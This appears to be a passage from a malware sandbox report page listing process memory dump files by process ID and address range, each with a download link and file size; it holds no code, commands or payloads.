memory/2204-264-0x0000000000000000-mapping.dmp

Download
memory/2224-218-0x00000000046B0000-0x00000000047B0000-memory.dmp

Filesize
1024KB

Download
memory/2224-182-0x0000000000000000-mapping.dmp

Download
memory/2224-224-0x0000000000400000-0x0000000002D4E000-memory.dmp

Filesize
41.3MB

Download
memory/2244-228-0x0000000004550000-0x0000000004551000-memory.dmp

Filesize
4KB

Download
memory/2244-184-0x0000000000000000-mapping.dmp

Download
memory/2244-202-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/2276-190-0x0000000000000000-mapping.dmp

Download
memory/2288-191-0x0000000000000000-mapping.dmp

Download
memory/2288-204-0x0000000000F90000-0x0000000000F91000-memory.dmp

Filesize
4KB

Download
memory/2288-225-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/2288-333-0x0000000000000000-mapping.dmp

Download
memory/2300-271-0x0000000000000000-mapping.dmp

Download
memory/2300-276-0x0000000000270000-0x0000000000282000-memory.dmp

Filesize
72KB

Download
memory/2300-275-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/2316-209-0x00000000010A0000-0x00000000010A1000-memory.dmp

Filesize
4KB

Download
memory/2316-221-0x000000001B000000-0x000000001B002000-memory.dmp

Filesize
8KB

Download
memory/2316-223-0x0000000000350000-0x0000000000384000-memory.dmp

Filesize
208KB

Download
memory/2316-193-0x0000000000000000-mapping.dmp

Download
memory/2316-214-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2316-226-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/2324-318-0x0000000000000000-mapping.dmp

Download
memory/2388-201-0x0000000000000000-mapping.dmp

Download
memory/2460-206-0x0000000000000000-mapping.dmp

Download
memory/2460-210-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2472-273-0x0000000000000000-mapping.dmp

Download
memory/2472-289-0x0000000004AB2000-0x0000000004AB3000-memory.dmp

Filesize
4KB

Download
memory/2472-287-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

Filesize
4KB

Download
memory/2492-280-0x0000000000000000-mapping.dmp

Download
memory/2548-216-0x0000000000000000-mapping.dmp

Download
memory/2556-294-0x0000000000000000-mapping.dmp

Download
memory/2588-234-0x0000000000220000-0x00000000002B3000-memory.dmp

Filesize
588KB

Download
memory/2588-235-0x0000000000400000-0x0000000000945000-memory.dmp

Filesize
5.3MB

Download
memory/2588-220-0x0000000000000000-mapping.dmp

Download
memory/2608-281-0x0000000000000000-mapping.dmp

Download
memory/2616-325-0x000000000040CD2F-mapping.dmp

Download
memory/2632-229-0x0000000000000000-mapping.dmp

Download
memory/2724-290-0x0000000000000000-mapping.dmp

Download
memory/2760-236-0x0000000000000000-mapping.dmp

Download
memory/2760-247-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2788-292-0x0000000000000000-mapping.dmp

Download
memory/2792-237-0x0000000000000000-mapping.dmp

Download
memory/2852-345-0x0000000000000000-mapping.dmp

Download
memory/2852-338-0x0000000000000000-mapping.dmp

Download
memory/2868-309-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2868-241-0x0000000000000000-mapping.dmp

Download
memory/2876-317-0x0000000000000000-mapping.dmp

Download
memory/2884-243-0x0000000000000000-mapping.dmp

Download
memory/2932-252-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/2932-248-0x0000000000000000-mapping.dmp

Download
memory/2932-253-0x0000000001322000-0x0000000001323000-memory.dmp

Filesize
4KB

Download
memory/3064-255-0x0000000000000000-mapping.dmp

Download
memory/3196-352-0x0000000000000000-mapping.dmp

Download
memory/3300-368-0x0000000000418E56-mapping.dmp

Download
memory/3388-371-0x0000000000000000-mapping.dmp

Download
memory/3408-373-0x0000000000000000-mapping.dmp

Download
memory/3516-376-0x0000000000000000-mapping.dmp

Download
memory/3556-377-0x0000000000000000-mapping.dmp

Download
memory/3572-378-0x0000000000000000-mapping.dmp

Download
memory/3668-384-0x0000000000000000-mapping.dmp

Download